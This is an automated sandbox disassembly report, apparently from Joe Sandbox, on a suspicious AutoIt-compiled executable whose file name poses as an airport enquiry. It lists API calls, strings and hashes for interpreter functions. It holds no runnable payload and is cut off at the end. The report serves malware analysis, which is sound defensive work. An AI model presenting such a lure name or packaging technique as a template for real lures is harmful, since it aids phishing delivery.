              • Part of subcall function 00C83A58: LoadIconW.USER32(000000A4), ref: 00C83A9A
              • Part of subcall function 00C83A58: LoadIconW.USER32(000000A2), ref: 00C83AAC
              • Part of subcall function 00C83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C83AD2
              • Part of subcall function 00C83A58: RegisterClassExW.USER32(?), ref: 00C83B28
              • Part of subcall function 00C839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C83A15
              • Part of subcall function 00C839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C83A36
              • Part of subcall function 00C839E7: ShowWindow.USER32(00000000,?,?), ref: 00C83A4A
              • Part of subcall function 00C839E7: ShowWindow.USER32(00000000,?,?), ref: 00C83A53
              • Part of subcall function 00C843DB: _memset.LIBCMT ref: 00C84401
              • Part of subcall function 00C843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C844A6
            Strings
            • runas, xrefs: 00CBD575
            • This is a third-party compiled AutoIt script., xrefs: 00CBD4B4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
            • String ID: This is a third-party compiled AutoIt script.$runas
            • API String ID: 529118366-3287110873
            • Opcode ID: 6ec6de1bc9ab085e845766df45433884d6675d8a98e61d8f370b41d8bb24d8b9
            • Instruction ID: 732c5fd8a1e09af8bab55d1515e18f2ef963bd6701d9eddfd15c9c1372bb2842
            • Opcode Fuzzy Hash: 6ec6de1bc9ab085e845766df45433884d6675d8a98e61d8f370b41d8bb24d8b9
            • Instruction Fuzzy Hash: 7051F775904388BFCF11FFB4DC45AED7B74AB06708F144265F456A22A1DAB0C605EB3A

            Control-flow Graph

            (control-flow graph data for the function at 00C84AFE omitted; the interactive graph viewer's node/edge list is not readable as text)
            APIs
            • GetVersionExW.KERNEL32(?), ref: 00C84B2B
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            • GetCurrentProcess.KERNEL32(?,00D0FAEC,00000000,00000000,?), ref: 00C84BF8
            • IsWow64Process.KERNEL32(00000000), ref: 00C84BFF
            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C84C45
            • FreeLibrary.KERNEL32(00000000), ref: 00C84C50
            • GetSystemInfo.KERNEL32(00000000), ref: 00C84C81
            • GetSystemInfo.KERNEL32(00000000), ref: 00C84C8D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
            • String ID:
            • API String ID: 1986165174-0
            • Opcode ID: 94be10f2d79760aa3603a16b96604d1722168c5d80486a1251df33c0f409b45d
            • Instruction ID: eba6f6c062a2f12054a8fe4ac6ca58a55b1b4218ab938681293c903541865dac
            • Opcode Fuzzy Hash: 94be10f2d79760aa3603a16b96604d1722168c5d80486a1251df33c0f409b45d
            • Instruction Fuzzy Hash: 7791E43154ABC1DEC735DB6884511AAFFE4AF2A304F584E9ED0DB93A01D220EA48D72D

            Control-flow Graph
            APIs
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C84EEE,?,?,00000000,00000000), ref: 00C84FF9
            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C84EEE,?,?,00000000,00000000), ref: 00C85010
            • LoadResource.KERNEL32(?,00000000,?,?,00C84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C84F8F), ref: 00CBDD60
            • SizeofResource.KERNEL32(?,00000000,?,?,00C84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C84F8F), ref: 00CBDD75
            • LockResource.KERNEL32(00C84EEE,?,?,00C84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C84F8F,00000000), ref: 00CBDD88
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
            • String ID: SCRIPT
            • API String ID: 3051347437-3967369404
            • Opcode ID: 5c061b098342d3980ec695669d5a0bf591ce72450b572ac2964fc351bd0073c6
            • Instruction ID: 1ec00d49fad3f1b5f5cfa4eeedb4457a2c1508fd1a7f0ebecdc1b05b33bc73e7
            • Opcode Fuzzy Hash: 5c061b098342d3980ec695669d5a0bf591ce72450b572ac2964fc351bd0073c6
            • Instruction Fuzzy Hash: C9115A75200700AFD7319B65DC58F677BB9EBC9B55F20816CF41ADA660DBA1EC008674
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharUpper
            • String ID:
            • API String ID: 3964851224-0
            • Opcode ID: 6e63ab64dfb426ab83e9cc45c00a2b8fb9c41f730881a1416c0630d5f3110396
            • Instruction ID: 8ac9cf2ed070b097c32254561a82023827db00371fbf755a8ef165d2c0a6a51e
            • Opcode Fuzzy Hash: 6e63ab64dfb426ab83e9cc45c00a2b8fb9c41f730881a1416c0630d5f3110396
            • Instruction Fuzzy Hash: C39278706083418FDB24DF14C494B6AB7E1BF89308F24896DF89A8B362D771ED45CB92
            APIs
            • GetFileAttributesW.KERNELBASE(?,00CBE7C1), ref: 00CE46A6
            • FindFirstFileW.KERNELBASE(?,?), ref: 00CE46B7
            • FindClose.KERNEL32(00000000), ref: 00CE46C7
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileFind$AttributesCloseFirst
            • String ID:
            • API String ID: 48322524-0
            • Opcode ID: 73175fc2bbe2b4947cc874d16e8e65a9df25004f4ccdf4a548525a79164efadf
            • Instruction ID: e9e9e8362e61c14fe42c4c03a07a3d3e0416655f28f6b5690aad46d95d481c5a
            • Opcode Fuzzy Hash: 73175fc2bbe2b4947cc874d16e8e65a9df25004f4ccdf4a548525a79164efadf
            • Instruction Fuzzy Hash: 3EE020314105005BC224B738EC4D5EE775CDE06335F200715F939C15E0E7B06D5085E9
            Strings
            • Variable must be of type 'Object'., xrefs: 00CC428C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID: Variable must be of type 'Object'.
            • API String ID: 0-109567571
            • Opcode ID: 0f8fcef8c15808db49e6269c43102db8fe0719e7000adde666f5fe26bd0a28f5
            • Instruction ID: 1c2b940623359d77ff10f81cbfb7703a706b042810a355fd22fb6dc4f0267e87
            • Opcode Fuzzy Hash: 0f8fcef8c15808db49e6269c43102db8fe0719e7000adde666f5fe26bd0a28f5
            • Instruction Fuzzy Hash: 78A2AF74A04215CFCB24EF99C480AADB7B1FF49318F24806DE926AB351D771ED42CB99
            APIs
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C90BBB
            • timeGetTime.WINMM ref: 00C90E76
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C90FB3
            • TranslateMessage.USER32(?), ref: 00C90FC7
            • DispatchMessageW.USER32(?), ref: 00C90FD5
            • Sleep.KERNEL32(0000000A), ref: 00C90FDF
            • LockWindowUpdate.USER32(00000000,?,?), ref: 00C9105A
            • DestroyWindow.USER32 ref: 00C91066
            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C91080
            • Sleep.KERNEL32(0000000A,?,?), ref: 00CC52AD
            • TranslateMessage.USER32(?), ref: 00CC608A
            • DispatchMessageW.USER32(?), ref: 00CC6098
            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CC60AC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
            • API String ID: 4003667617-3242690629
            • Opcode ID: 7f23c6fe264efa8f81607b17791fd70bec131551fe113433dcc7f5eb26aa4db0
            • Instruction ID: f827ae144cfcd8923259ab242050c0a9164ec874e23aced2dc38b6f245dac3c1
            • Opcode Fuzzy Hash: 7f23c6fe264efa8f81607b17791fd70bec131551fe113433dcc7f5eb26aa4db0
            • Instruction Fuzzy Hash: 52B2B170608741DFDB28DF24C888FAAB7E4BF85304F24491DF49A87291DB71E985DB92

            Control-flow Graph

            APIs
              • Part of subcall function 00CE91E9: __time64.LIBCMT ref: 00CE91F3
              • Part of subcall function 00C85045: _fseek.LIBCMT ref: 00C8505D
            • __wsplitpath.LIBCMT ref: 00CE94BE
              • Part of subcall function 00CA432E: __wsplitpath_helper.LIBCMT ref: 00CA436E
            • _wcscpy.LIBCMT ref: 00CE94D1
            • _wcscat.LIBCMT ref: 00CE94E4
            • __wsplitpath.LIBCMT ref: 00CE9509
            • _wcscat.LIBCMT ref: 00CE951F
            • _wcscat.LIBCMT ref: 00CE9532
              • Part of subcall function 00CE922F: _memmove.LIBCMT ref: 00CE9268
              • Part of subcall function 00CE922F: _memmove.LIBCMT ref: 00CE9277
            • _wcscmp.LIBCMT ref: 00CE9479
              • Part of subcall function 00CE99BE: _wcscmp.LIBCMT ref: 00CE9AAE
              • Part of subcall function 00CE99BE: _wcscmp.LIBCMT ref: 00CE9AC1
            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CE96DC
            • _wcsncpy.LIBCMT ref: 00CE974F
            • DeleteFileW.KERNEL32(?,?), ref: 00CE9785
            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CE979B
            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE97AC
            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE97BE
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
            • String ID:
            • API String ID: 1500180987-0
            • Opcode ID: b3bd105b97f684792a542e12d264e39fa3c6a4704f2649ad2de8407b0ae62e0d
            • Instruction ID: 62e9fa3a398dfe1bcdc0a139366f042268c8d51a0208f742c9f4ed824218ed67
            • Opcode Fuzzy Hash: b3bd105b97f684792a542e12d264e39fa3c6a4704f2649ad2de8407b0ae62e0d
            • Instruction Fuzzy Hash: 11C12CB1D00229AEDF21DFA5CC85ADEB7BDEF45304F0040AAF609E7151EB709A849F65

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00C83074
            • RegisterClassExW.USER32(00000030), ref: 00C8309E
            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C830AF
            • InitCommonControlsEx.COMCTL32(?), ref: 00C830CC
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C830DC
            • LoadIconW.USER32(000000A9), ref: 00C830F2
            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C83101
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
            • API String ID: 2914291525-1005189915
            • Opcode ID: a8da1d79ab8debfc545f24c794a4216870306d1b487736b490b92f7f3726a428
            • Instruction ID: 58f9ad75fe5fc1817fad3a79e90a708bfc7bbdb5ae87941d1d68e1db5710a190
            • Opcode Fuzzy Hash: a8da1d79ab8debfc545f24c794a4216870306d1b487736b490b92f7f3726a428
            • Instruction Fuzzy Hash: 683136B5941309AFDB50DFA4EC84BC9BBF0FB0A310F24452AE585E63A0E3B545418FA2

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00C83074
            • RegisterClassExW.USER32(00000030), ref: 00C8309E
            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C830AF
            • InitCommonControlsEx.COMCTL32(?), ref: 00C830CC
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C830DC
            • LoadIconW.USER32(000000A9), ref: 00C830F2
            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C83101
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
            • API String ID: 2914291525-1005189915
            • Opcode ID: af248964d9b4e1ce61ca10d91ff4a76ed11c8c3b0091d56edd1745866a0fbb39
            • Instruction ID: f5f97a43768bc5a374547c35bd30c06bb0f5cdba8d219e402997da64f2f5bb19
            • Opcode Fuzzy Hash: af248964d9b4e1ce61ca10d91ff4a76ed11c8c3b0091d56edd1745866a0fbb39
            • Instruction Fuzzy Hash: B821C5B5900318AFDB10DFA4E889B9DBBF4FB0A700F10452AF915E63A0D7B145448FA6

            Control-flow Graph

            APIs
              • Part of subcall function 00C84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D462F8,?,00C837C0,?), ref: 00C84882
              • Part of subcall function 00CA074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C872C5), ref: 00CA0771
            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C87308
            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00CBECF1
            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00CBED32
            • RegCloseKey.ADVAPI32(?), ref: 00CBED70
            • _wcscat.LIBCMT ref: 00CBEDC9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
            • API String ID: 2673923337-2727554177
            • Opcode ID: 31880189216128de3880e6ec9597181485b5ba84009f1f107576e9d8a819ff65
            • Instruction ID: 9ef0e414f6f959b3c2910bcb7393d58f8e9aa68d5dceba5eb807094c26cc05c1
            • Opcode Fuzzy Hash: 31880189216128de3880e6ec9597181485b5ba84009f1f107576e9d8a819ff65
            • Instruction Fuzzy Hash: 437169754083019FC314EF65EC819ABBBE8BF56744F50092EF455C32A0EBB09948DBAA

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00C83A62
            • LoadCursorW.USER32(00000000,00007F00), ref: 00C83A71
            • LoadIconW.USER32(00000063), ref: 00C83A88
            • LoadIconW.USER32(000000A4), ref: 00C83A9A
            • LoadIconW.USER32(000000A2), ref: 00C83AAC
            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C83AD2
            • RegisterClassExW.USER32(?), ref: 00C83B28
              • Part of subcall function 00C83041: GetSysColorBrush.USER32(0000000F), ref: 00C83074
              • Part of subcall function 00C83041: RegisterClassExW.USER32(00000030), ref: 00C8309E
              • Part of subcall function 00C83041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C830AF
              • Part of subcall function 00C83041: InitCommonControlsEx.COMCTL32(?), ref: 00C830CC
              • Part of subcall function 00C83041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C830DC
              • Part of subcall function 00C83041: LoadIconW.USER32(000000A9), ref: 00C830F2
              • Part of subcall function 00C83041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C83101
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
            • String ID: #$0$AutoIt v3
            • API String ID: 423443420-4155596026
            • Opcode ID: 180d45b57b28c2fd1a96b38fe26e702ac17e3ae91e170880ca9e6f6026ad2393
            • Instruction ID: 4788c2f7c0341e9e98ca214d4fec01309b3c405d1e6b1c211e3652f66b9f25a2
            • Opcode Fuzzy Hash: 180d45b57b28c2fd1a96b38fe26e702ac17e3ae91e170880ca9e6f6026ad2393
            • Instruction Fuzzy Hash: F7213974900304BFEF109FA4EC89B9D7BB4FB0A715F10012AE505E63A0D3B696549FAA

            Control-flow Graph
            APIs
            • DefWindowProcW.USER32(?,?,?,?), ref: 00C836D2
            • KillTimer.USER32(?,00000001), ref: 00C836FC
            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C8371F
            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C8372A
            • CreatePopupMenu.USER32 ref: 00C8373E
            • PostQuitMessage.USER32(00000000), ref: 00C8375F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
            • String ID: TaskbarCreated
            • API String ID: 129472671-2362178303
            • Opcode ID: c70500484de1ce8adf5a99408dd8edcf7cecac0feac4aaf35925efbe8a5e82c7
            • Instruction ID: 103564ee875eecdd71443da84ff0f34463ad345f8d8ff86474289d7b5c6078e2
            • Opcode Fuzzy Hash: c70500484de1ce8adf5a99408dd8edcf7cecac0feac4aaf35925efbe8a5e82c7
            • Instruction Fuzzy Hash: C041F3B2200285BBDB247F28DD49B7D3754F742B04F141529F913C23A1EAA0DE04977B

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
            • API String ID: 1825951767-3513169116
            • Opcode ID: 4001897f6674ff1ee9f5c94c2790ce53a217e39bbabfbec51dfde8f2b9991dbd
            • Instruction ID: d4b28e0cd587a5e6eb77389987085aa4d5cb77e2fb758da5014d3792d06408b6
            • Opcode Fuzzy Hash: 4001897f6674ff1ee9f5c94c2790ce53a217e39bbabfbec51dfde8f2b9991dbd
            • Instruction Fuzzy Hash: CAA19F72910269ABCB04FFA0CC91AEEB778FF15708F140429F416A7191EF749A09DB69

            Control-flow Graph
            APIs
            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C83A15
            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C83A36
            • ShowWindow.USER32(00000000,?,?), ref: 00C83A4A
            • ShowWindow.USER32(00000000,?,?), ref: 00C83A53
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
